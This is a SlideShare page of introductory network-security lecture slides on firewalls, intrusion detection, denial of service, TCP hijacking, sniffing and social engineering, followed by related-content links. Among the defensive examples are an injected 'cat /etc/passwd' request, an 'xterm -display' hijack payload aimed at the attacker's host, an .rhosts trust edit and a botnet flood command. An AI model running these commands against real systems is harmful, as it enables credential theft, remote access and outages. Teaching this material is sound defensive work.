SlideShare a Scribd company logo
NETWORK SECURITY BASICS
OVERVIEW
• What is security?
• Why do we need security?
• Who is vulnerable?
• Common security attacks and countermeasures
• Firewalls & Intrusion Detection Systems
• Denial of Service Attacks
• TCP Attacks
• Packet Sniffing
• Social Problems
2
WHAT IS “SECURITY”
• Dictionary.com says:
• 1. Freedom from risk or danger; safety.
• 2. Freedom from doubt, anxiety, or fear; confidence.
• 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security if
a visitor acts suspicious.
• 2. Measures adopted by a government to prevent espionage,
sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to prevent a
crime such as burglary or assault: Security was lax at the firm's
smaller plant.
…etc.
3
WHY DO WE NEED SECURITY?
• Protect vital information while still allowing access to those who
need it
• Trade secrets, medical records, etc.
• Provide authentication and access control for resources
• Ex: AFS
• Guarantee availability of resources
• Ex: 5 9’s (99.999% reliability)
7
WHO IS VULNERABLE?
• Financial institutions and banks
• Internet service providers
• Pharmaceutical companies
• Government and defense agencies
• Contractors to various government agencies
• Multinational corporations
• ANYONE ON THE NETWORK
8
COMMON SECURITY ATTACKS AND THEIR
COUNTERMEASURES
• Finding a way into the network
• Firewalls
• Exploiting software bugs, buffer overflows
• Intrusion Detection Systems
• Denial of Service
• Ingress filtering, IDS
• TCP hijacking
• IPSec
• Packet sniffing
• Encryption (SSH, SSL, HTTPS)
• Social problems
• Education
9
FIREWALLS
• Basic problem – many network applications and protocols have
security problems that are fixed over time
• Difficult for users to keep up with changes and keep host secure
• Solution
• Administrators limit access to end hosts by using a firewall
• Firewall is kept up-to-date by administrators
10
FIREWALLS
• A firewall is like a castle with a drawbridge
• Only one point of access into the network
• This can be good or bad
• Can be hardware or software
• Ex. Some routers come with firewall functionality
• ipfw, ipchains, pf on Unix systems, Windows XP and Mac OS X have built
in firewalls
11
FIREWALLS
12
Intranet
DMZ
Internet
Firewall
Firewall
Web server, email
server, web proxy,
etc
FIREWALLS
• Used to filter packets based on a combination of
features
• These are called packet filtering firewalls
• There are other types too, but they will not be discussed
• Ex. Drop packets with destination port of 23 (Telnet)
• Can use any combination of IP/UDP/TCP header information
• man ipfw on unix47 for much more detail
• But why don’t we just turn Telnet off? 13
FIREWALLS
• Here is what a computer with a default Windows XP install looks
like:
• 135/tcp open loc-srv
• 139/tcp open netbios-ssn
• 445/tcp open microsoft-ds
• 1025/tcp open NFS-or-IIS
• 3389/tcp open ms-term-serv
• 5000/tcp open UPnP
• Might need some of these services, or might not be able to
control all the machines on the network
14
FIREWALLS
• What does a firewall rule look like?
• Depends on the firewall used
• Example: ipfw
• /sbin/ipfw add deny tcp from cracker.evil.org to
wolf.tambov.su telnet
• Other examples: WinXP & Mac OS X have built in and third party
firewalls
• Different graphical user interfaces
• Varying amounts of complexity and power 15
INTRUSION DETECTION
• Used to monitor for “suspicious activity” on a network
• Can protect against known software exploits, like buffer overflows
• Open Source IDS: Snort, www.snort.org
16
INTRUSION DETECTION
• Uses “intrusion signatures”
• Well known patterns of behavior
• Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS
attempts, etc.
• Example
• IRIX vulnerability in webdist.cgi
• Can make a rule to drop packets containing the line
• “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”
• However, IDS is only useful if contingency plans are in place to
curb attacks as they are occurring
17
MINOR DETOUR…
• Say we got the /etc/passwd file from the IRIX server
• What can we do with it?
18
DICTIONARY ATTACK
• We can run a dictionary attack on the passwords
• The passwords in /etc/passwd are encrypted with the crypt(3) function
(one-way hash)
• Can take a dictionary of words, crypt() them all, and compare with the
hashed passwords
• This is why your passwords should be meaningless random
junk!
• For example, “sdfo839f” is a good password
• That is not my andrew password
• Please don’t try it either 19
DENIAL OF SERVICE
• Purpose: Make a network service unusable, usually by
overloading the server or network
• Many different kinds of DoS attacks
• SYN flooding
• SMURF
• Distributed attacks
• Mini Case Study: Code-Red
20
DENIAL OF SERVICE
• SYN flooding attack
• Send SYN packets with bogus source address
• Why?
• Server responds with SYN ACK and keeps state about TCP half-
open connection
• Eventually, server memory is exhausted with this state
• Solution: use “SYN cookies”
• In response to a SYN, create a special “cookie” for the connection, and
forget everything else
• Then, can recreate the forgotten information when the ACK comes in
from a legitimate connection
21
DENIAL OF SERVICE
22
DENIAL OF SERVICE
• SMURF
• Source IP address of a broadcast ping is forged
• Large number of machines respond back to victim, overloading it
23
DENIAL OF SERVICE
24
Internet
Perpetrator Victim
ICMP echo (spoofed source address of victim)
Sent to IP broadcast address
ICMP echo reply
DENIAL OF SERVICE
• Distributed Denial of Service
• Same techniques as regular DoS, but on a much larger scale
• Example: Sub7Server Trojan and IRC bots
• Infect a large number of machines with a “zombie” program
• Zombie program logs into an IRC channel and awaits commands
• Example:
• Bot command: !p4 207.71.92.193
• Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
• Sends 10,000 64k packets to the host (655MB!)
• Read more at: http://grc.com/dos/grcdos.htm
25
DENIAL OF SERVICE
• Mini Case Study – CodeRed
• July 19, 2001: over 359,000 computers infected with Code-Red in less
than 14 hours
• Used a recently known buffer exploit in Microsoft IIS
• Damages estimated in excess of $2.6 billion
26
DENIAL OF SERVICE
• Why is this under the Denial of Service category?
• CodeRed launched a DDOS attack against www1.whitehouse.gov from
the 20th to the 28th of every month!
• Spent the rest of its time infecting other hosts
27
DENIAL OF SERVICE
• How can we protect ourselves?
• Ingress filtering
• If the source IP of a packet comes in on an interface which does not have a
route to that packet, then drop it
• RFC 2267 has more information about this
• Stay on top of CERT advisories and the latest security patches
• A fix for the IIS buffer overflow was released sixteen days before CodeRed
had been deployed!
28
TCP ATTACKS
• Recall how IP works…
• End hosts create IP packets and routers process them purely based on
destination address alone
• Problem: End hosts may lie about other fields which do not
affect delivery
• Source address – host may trick destination into believing that the
packet is from a trusted source
• Especially applications which use IP addresses as a simple authentication
method
• Solution – use better authentication methods
29
TCP ATTACKS
• TCP connections have associated state
• Starting sequence numbers, port numbers
• Problem – what if an attacker learns these values?
• Port numbers are sometimes well known to begin with (ex. HTTP uses
port 80)
• Sequence numbers are sometimes chosen in very predictable ways
30
TCP ATTACKS
• If an attacker learns the associated TCP state for the
connection, then the connection can be hijacked!
• Attacker can insert malicious data into the TCP stream, and the
recipient will believe it came from the original source
• Ex. Instead of downloading and running new program, you download a
virus and execute it
31
TCP ATTACKS
• Say hello to Alice, Bob and Mr. Big Ears
32
TCP ATTACKS
• Alice and Bob have an established TCP connection
33
TCP ATTACKS
• Mr. Big Ears lies on the path between Alice and Bob on the
network
• He can intercept all of their packets
34
TCP ATTACKS
• First, Mr. Big Ears must drop all of Alice’s packets since they
must not be delivered to Bob (why?)
35
Packets
The Void
TCP ATTACKS
• Then, Mr. Big Ears sends his malicious packet with the next ISN
(sniffed from the network)
36
ISN, SRC=Alice
TCP ATTACKS
• What if Mr. Big Ears is unable to sniff the packets between Alice
and Bob?
• Can just DoS Alice instead of dropping her packets
• Can just send guesses of what the ISN is until it is accepted
• How do you know when the ISN is accepted?
• Mitnick: payload is “add self to .rhosts”
• Or, “xterm -display MrBigEars:0”
37
TCP ATTACKS
• Why are these types of TCP attacks so dangerous?
38
Web server
Malicious user
Trusting web client
TCP ATTACKS
• How do we prevent this?
• IPSec
• Provides source authentication, so Mr. Big Ears cannot pretend to be
Alice
• Encrypts data before transport, so Mr. Big Ears cannot talk to Bob
without knowing what the session key is
39
PACKET SNIFFING
• Recall how Ethernet works …
• When someone wants to send a packet to some else …
• They put the bits on the wire with the destination MAC address
…
• And remember that other hosts are listening on the wire to
detect for collisions …
• It couldn’t get any easier to figure out what data is being
transmitted over the network!
41
PACKET SNIFFING
• This works for wireless too!
• In fact, it works for any broadcast-based medium
42
PACKET SNIFFING
• What kinds of data can we get?
• Asked another way, what kind of information would be most
useful to a malicious user?
• Answer: Anything in plain text
• Passwords are the most popular
43
PACKET SNIFFING
• How can we protect ourselves?
• SSH, not Telnet
• Many people at CMU still use Telnet and send their password in the clear (use PuTTY
instead!)
• Now that I have told you this, please do not exploit this information
• Packet sniffing is, by the way, prohibited by Computing Services
• HTTP over SSL
• Especially when making purchases with credit cards!
• SFTP, not FTP
• Unless you really don’t care about the password or data
• Can also use KerbFTP (download from MyAndrew)
• IPSec
• Provides network-layer confidentiality
44
SOCIAL PROBLEMS
• People can be just as dangerous as unprotected computer
systems
• People can be lied to, manipulated, bribed, threatened, harmed,
tortured, etc. to give up valuable information
• Most humans will breakdown once they are at the “harmed” stage, unless
they have been specially trained
• Think government here…
45
SOCIAL PROBLEMS
• Fun Example 1:
• “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a
bunch of buttons for me”
46
SOCIAL PROBLEMS
• Fun Example 2:
• Someone calls you in the middle of the night
• “Have you been calling Egypt for the last six hours?”
• “No”
• “Well, we have a call that’s actually active right now, it’s on your calling card
and it’s to Egypt and as a matter of fact, you’ve got about $2000 worth of
charges on your card and … read off your AT&T card number and PIN and
then I’ll get rid of the charge for you”
47
SOCIAL PROBLEMS
• Fun Example 3:
• Who saw Office Space?
• In the movie, the three disgruntled employees installed a money-
stealing worm onto the companies systems
• They did this from inside the company, where they had full access to the
companies systems
• What security techniques can we use to prevent this type of access?
48
SOCIAL PROBLEMS
• There aren’t always solutions to all of these problems
• Humans will continue to be tricked into giving out information they
shouldn’t
• Educating them may help a little here, but, depending on how bad you
want the information, there are a lot of bad things you can do to get it
• So, the best that can be done is to implement a wide variety of
solutions and more closely monitor who has access to what
network resources and information
• But, this solution is still not perfect
49
CONCLUSIONS
• The Internet works only because we implicitly trust one another
• It is very easy to exploit this trust
• The same holds true for software
• It is important to stay on top of the latest CERT security
advisories to know how to patch any security holes
50
SECURITY RELATED URLS
• http://www.robertgraham.com/pubs/network-intrusion-
detection.html
• http://online.securityfocus.com/infocus/1527
• http://www.snort.org/
• http://www.cert.org/
• http://www.nmap.org/
• http://grc.com/dos/grcdos.htm
• http://lcamtuf.coredump.cx/newtcp/
51

More Related Content

What's hot

Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issues
Pierluigi Paganini
 
Cyber Security - awareness, vulnerabilities and solutions
Cyber Security - awareness, vulnerabilities and solutionsCyber Security - awareness, vulnerabilities and solutions
Cyber Security - awareness, vulnerabilities and solutions
inLabFIB
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Accellis Technology Group
 
Cyber security # Lec 1
Cyber security # Lec 1Cyber security # Lec 1
Cyber security # Lec 1
Kabul Education University
 
Ransomware ly
Ransomware lyRansomware ly
Ransomware ly
Lisa Young
 
презентация1
презентация1презентация1
презентация1
sagidullaa01
 
The Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup StoryThe Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup Story
Quest
 
Cyber security awareness training by cyber security infotech(csi)
Cyber security awareness training by cyber security infotech(csi)Cyber security awareness training by cyber security infotech(csi)
Cyber security awareness training by cyber security infotech(csi)
Cyber Security Infotech
 
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
CODE BLUE
 
Information cyber security
Information cyber securityInformation cyber security
Information cyber security
SumanPramanik7
 
Computer security and privacy
Computer security and privacyComputer security and privacy
Computer security and privacy
eiramespi07
 
Cyber security mis
Cyber security  misCyber security  mis
Cyber security mis
Aditya Singh Rana
 
Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...
Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...
Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...
Michael Noel
 
Cyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-ProCyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-Pro
Ronald Soh
 
Hyphenet Security Awareness Training
Hyphenet Security Awareness TrainingHyphenet Security Awareness Training
Hyphenet Security Awareness Training
Jen Ruhman
 
Computer Network Security
Computer Network SecurityComputer Network Security
Computer Network Security
Bryley Systems Inc.
 
Cyberskills shortage: Where is the cyber workforce of tomorrow
Cyberskills shortage:Where is the cyber workforce of tomorrowCyberskills shortage:Where is the cyber workforce of tomorrow
Cyberskills shortage: Where is the cyber workforce of tomorrow
Stephen Cobb
 
Computer Security 101
Computer Security 101Computer Security 101
Computer Security 101
Progressive Integrations
 
Incident handling of cyber espionage
Incident handling of cyber espionageIncident handling of cyber espionage
Incident handling of cyber espionage
Marie Elisabeth Gaup Moe
 
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling    Reducing Losses By Combining Sci...E Fraud And Predictive Forensic Profiling    Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
Stefano Maria De' Rossi
 

What's hot (20)

Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issues
 
Cyber Security - awareness, vulnerabilities and solutions
Cyber Security - awareness, vulnerabilities and solutionsCyber Security - awareness, vulnerabilities and solutions
Cyber Security - awareness, vulnerabilities and solutions
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
 
Cyber security # Lec 1
Cyber security # Lec 1Cyber security # Lec 1
Cyber security # Lec 1
 
Ransomware ly
Ransomware lyRansomware ly
Ransomware ly
 
презентация1
презентация1презентация1
презентация1
 
The Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup StoryThe Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup Story
 
Cyber security awareness training by cyber security infotech(csi)
Cyber security awareness training by cyber security infotech(csi)Cyber security awareness training by cyber security infotech(csi)
Cyber security awareness training by cyber security infotech(csi)
 
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
 
Information cyber security
Information cyber securityInformation cyber security
Information cyber security
 
Computer security and privacy
Computer security and privacyComputer security and privacy
Computer security and privacy
 
Cyber security mis
Cyber security  misCyber security  mis
Cyber security mis
 
Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...
Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...
Securing IT Against Modern Threats with Microsoft Cloud Security Tools - M365...
 
Cyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-ProCyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-Pro
 
Hyphenet Security Awareness Training
Hyphenet Security Awareness TrainingHyphenet Security Awareness Training
Hyphenet Security Awareness Training
 
Computer Network Security
Computer Network SecurityComputer Network Security
Computer Network Security
 
Cyberskills shortage: Where is the cyber workforce of tomorrow
Cyberskills shortage:Where is the cyber workforce of tomorrowCyberskills shortage:Where is the cyber workforce of tomorrow
Cyberskills shortage: Where is the cyber workforce of tomorrow
 
Computer Security 101
Computer Security 101Computer Security 101
Computer Security 101
 
Incident handling of cyber espionage
Incident handling of cyber espionageIncident handling of cyber espionage
Incident handling of cyber espionage
 
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling    Reducing Losses By Combining Sci...E Fraud And Predictive Forensic Profiling    Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
 

Similar to Network security basics

Network security
Network securityNetwork security
Network security
syed mehdi raza
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
Tariq kanher
 
Network Security
Network SecurityNetwork Security
Network Security
DURYODHAN MAHAPATRA
 
Network Security
Network  SecurityNetwork  Security
Network Security
VIKAS SINGH BHADOURIA
 
Network Security
Network SecurityNetwork Security
Network Security
Mohammed Adam
 
Coporate Espionage
Coporate EspionageCoporate Espionage
Coporate Espionage
UTD Computer Security Group
 
Security attacks
Security attacksSecurity attacks
Security attacks
Tejaswi Potluri
 
WiFi Intrustion Detection from WireShark SharkFest
WiFi Intrustion Detection from WireShark SharkFestWiFi Intrustion Detection from WireShark SharkFest
WiFi Intrustion Detection from WireShark SharkFest
David Sweigert
 
Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5
Alec Muffett
 
Threats to network
Threats to networkThreats to network
Threats to network
Q4Points.com
 
26 security2
26 security226 security2
26 security2
congiodiqua
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
Vinil Patel
 
CNIT 123: Ch 13: Network Protection Systems
CNIT 123: Ch 13: Network Protection SystemsCNIT 123: Ch 13: Network Protection Systems
CNIT 123: Ch 13: Network Protection Systems
Sam Bowne
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
sumita02
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
jepoy808
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
anakorang28
 
Hacking Cisco Networks and Countermeasures
Hacking Cisco Networks and CountermeasuresHacking Cisco Networks and Countermeasures
Hacking Cisco Networks and Countermeasures
dkaya
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
Narayan Suthar
 
Network security
Network securityNetwork security
Network security
Shaikh Muhammed
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
sureshfsp
 

Similar to Network security basics (20)

Network security
Network securityNetwork security
Network security
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
 
Network Security
Network SecurityNetwork Security
Network Security
 
Network Security
Network  SecurityNetwork  Security
Network Security
 
Network Security
Network SecurityNetwork Security
Network Security
 
Coporate Espionage
Coporate EspionageCoporate Espionage
Coporate Espionage
 
Security attacks
Security attacksSecurity attacks
Security attacks
 
WiFi Intrustion Detection from WireShark SharkFest
WiFi Intrustion Detection from WireShark SharkFestWiFi Intrustion Detection from WireShark SharkFest
WiFi Intrustion Detection from WireShark SharkFest
 
Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5
 
Threats to network
Threats to networkThreats to network
Threats to network
 
26 security2
26 security226 security2
26 security2
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
 
CNIT 123: Ch 13: Network Protection Systems
CNIT 123: Ch 13: Network Protection SystemsCNIT 123: Ch 13: Network Protection Systems
CNIT 123: Ch 13: Network Protection Systems
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
Hacking Cisco Networks and Countermeasures
Hacking Cisco Networks and CountermeasuresHacking Cisco Networks and Countermeasures
Hacking Cisco Networks and Countermeasures
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
 
Network security
Network securityNetwork security
Network security
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
 

More from Skillspire LLC

Logistics
LogisticsLogistics
Logistics
Skillspire LLC
 
Introduction to analytics
Introduction to analyticsIntroduction to analytics
Introduction to analytics
Skillspire LLC
 
Lecture 31
Lecture 31Lecture 31
Lecture 31
Skillspire LLC
 
Lecture 30
Lecture 30Lecture 30
Lecture 30
Skillspire LLC
 
Lecture 29
Lecture 29Lecture 29
Lecture 29
Skillspire LLC
 
Review
ReviewReview
Review version 4
Review version 4Review version 4
Review version 4
Skillspire LLC
 
Review version 3
Review version 3Review version 3
Review version 3
Skillspire LLC
 
Review version 2
Review version 2Review version 2
Review version 2
Skillspire LLC
 
Lecture 25
Lecture 25Lecture 25
Lecture 25
Skillspire LLC
 
Lecture 24
Lecture 24Lecture 24
Lecture 24
Skillspire LLC
 
Lecture 23 p1
Lecture 23 p1Lecture 23 p1
Lecture 23 p1
Skillspire LLC
 
Lecture 21
Lecture 21Lecture 21
Lecture 21
Skillspire LLC
 
Lecture 17
Lecture 17Lecture 17
Lecture 17
Skillspire LLC
 
Lecture 16
Lecture 16Lecture 16
Lecture 16
Skillspire LLC
 
Lecture 15
Lecture 15Lecture 15
Lecture 15
Skillspire LLC
 
Lecture 14
Lecture 14Lecture 14
Lecture 14
Skillspire LLC
 
Lecture 14
Lecture 14Lecture 14
Lecture 14
Skillspire LLC
 
Lecture 13
Lecture 13Lecture 13
Lecture 13
Skillspire LLC
 
Lecture 12
Lecture 12Lecture 12
Lecture 12
Skillspire LLC
 

More from Skillspire LLC (20)

Logistics
LogisticsLogistics
Logistics
 
Introduction to analytics
Introduction to analyticsIntroduction to analytics
Introduction to analytics
 
Lecture 31
Lecture 31Lecture 31
Lecture 31
 
Lecture 30
Lecture 30Lecture 30
Lecture 30
 
Lecture 29
Lecture 29Lecture 29
Lecture 29
 
Review
ReviewReview
Review
 
Review version 4
Review version 4Review version 4
Review version 4
 
Review version 3
Review version 3Review version 3
Review version 3
 
Review version 2
Review version 2Review version 2
Review version 2
 
Lecture 25
Lecture 25Lecture 25
Lecture 25
 
Lecture 24
Lecture 24Lecture 24
Lecture 24
 
Lecture 23 p1
Lecture 23 p1Lecture 23 p1
Lecture 23 p1
 
Lecture 21
Lecture 21Lecture 21
Lecture 21
 
Lecture 17
Lecture 17Lecture 17
Lecture 17
 
Lecture 16
Lecture 16Lecture 16
Lecture 16
 
Lecture 15
Lecture 15Lecture 15
Lecture 15
 
Lecture 14
Lecture 14Lecture 14
Lecture 14
 
Lecture 14
Lecture 14Lecture 14
Lecture 14
 
Lecture 13
Lecture 13Lecture 13
Lecture 13
 
Lecture 12
Lecture 12Lecture 12
Lecture 12
 

Recently uploaded

How to Manage Your Lost Opportunities in Odoo 17 CRM
How to Manage Your Lost Opportunities in Odoo 17 CRMHow to Manage Your Lost Opportunities in Odoo 17 CRM
How to Manage Your Lost Opportunities in Odoo 17 CRM
Celine George
 
Advanced Java[Extra Concepts, Not Difficult].docx
Advanced Java[Extra Concepts, Not Difficult].docxAdvanced Java[Extra Concepts, Not Difficult].docx
Advanced Java[Extra Concepts, Not Difficult].docx
adhitya5119
 
clinical examination of hip joint (1).pdf
clinical examination of hip joint (1).pdfclinical examination of hip joint (1).pdf
clinical examination of hip joint (1).pdf
Priyankaranawat4
 
spot a liar (Haiqa 146).pptx Technical writhing and presentation skills
spot a liar (Haiqa 146).pptx Technical writhing and presentation skillsspot a liar (Haiqa 146).pptx Technical writhing and presentation skills
spot a liar (Haiqa 146).pptx Technical writhing and presentation skills
haiqairshad
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...
Nguyen Thanh Tu Collection
 
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdfবাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
eBook.com.bd (প্রয়োজনীয় বাংলা বই)
 
Film vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movieFilm vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movie
Nicholas Montgomery
 
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdfANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
Priyankaranawat4
 
คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1
คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1
คำศัพท์ คำพื้นฐานการอ่าน ภาษาอังกฤษ ระดับชั้น ม.1
สมใจ จันสุกสี
 
writing about opinions about Australia the movie
writing about opinions about Australia the moviewriting about opinions about Australia the movie
writing about opinions about Australia the movie
Nicholas Montgomery
 
Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...
Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...
Reimagining Your Library Space: How to Increase the Vibes in Your Library No ...
Diana Rendina
 
How to Create a More Engaging and Human Online Learning Experience
How to Create a More Engaging and Human Online Learning Experience How to Create a More Engaging and Human Online Learning Experience
How to Create a More Engaging and Human Online Learning Experience
Wahiba Chair Training & Consulting
 
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...
BÀI TẬP BỔ TRỢ TIẾNG ANH LỚP 9 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2024-2025 - ...
Nguyen Thanh Tu Collection
 
Digital Artefact 1 - Tiny Home Environmental Design
Digital Artefact 1 - Tiny Home Environmental DesignDigital Artefact 1 - Tiny Home Environmental Design
Digital Artefact 1 - Tiny Home Environmental Design
amberjdewit93
 
Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...
Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...
Traditional Musical Instruments of Arunachal Pradesh and Uttar Pradesh - RAYH...
imrankhan141184
 
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptxChapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Denish Jangid
 
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
GeorgeMilliken2
 
C1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptx
C1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptxC1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptx
C1 Rubenstein AP HuG xxxxxxxxxxxxxx.pptx
mulvey2
 
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
PECB
 
Walmart Business+ and Spark Good for Nonprofits.pdf
Walmart Business+ and Spark Good for Nonprofits.pdfWalmart Business+ and Spark Good for Nonprofits.pdf
Walmart Business+ and Spark Good for Nonprofits.pdf
TechSoup
 

Recently uploaded (20)

How to Manage Your Lost Opportunities in Odoo 17 CRM
How to Manage Your Lost Opportunities in Odoo 17 CRMHow to Manage Your Lost Opportunities in Odoo 17 CRM
How to Manage Your Lost Opportunities in Odoo 17 CRM
 
Advanced Java[Extra Concepts, Not Difficult].docx
Advanced Java[Extra Concepts, Not Difficult].docxAdvanced Java[Extra Concepts, Not Difficult].docx
Advanced Java[Extra Concepts, Not Difficult].docx
 
clinical examination of hip joint (1).pdf
clinical examination of hip joint (1).pdfclinical examination of hip joint (1).pdf
clinical examination of hip joint (1).pdf
 
spot a liar (Haiqa 146).pptx Technical writhing and presentation skills
spot a liar (Haiqa 146).pptx Technical writhing and presentation skillsspot a liar (Haiqa 146).pptx Technical writhing and presentation skills
spot a liar (Haiqa 146).pptx Technical writhing and presentation skills
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...BÀI TẬP BỔ TRỢ TIẾNG ANH 8 CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC 2023-2024 (CÓ FI...
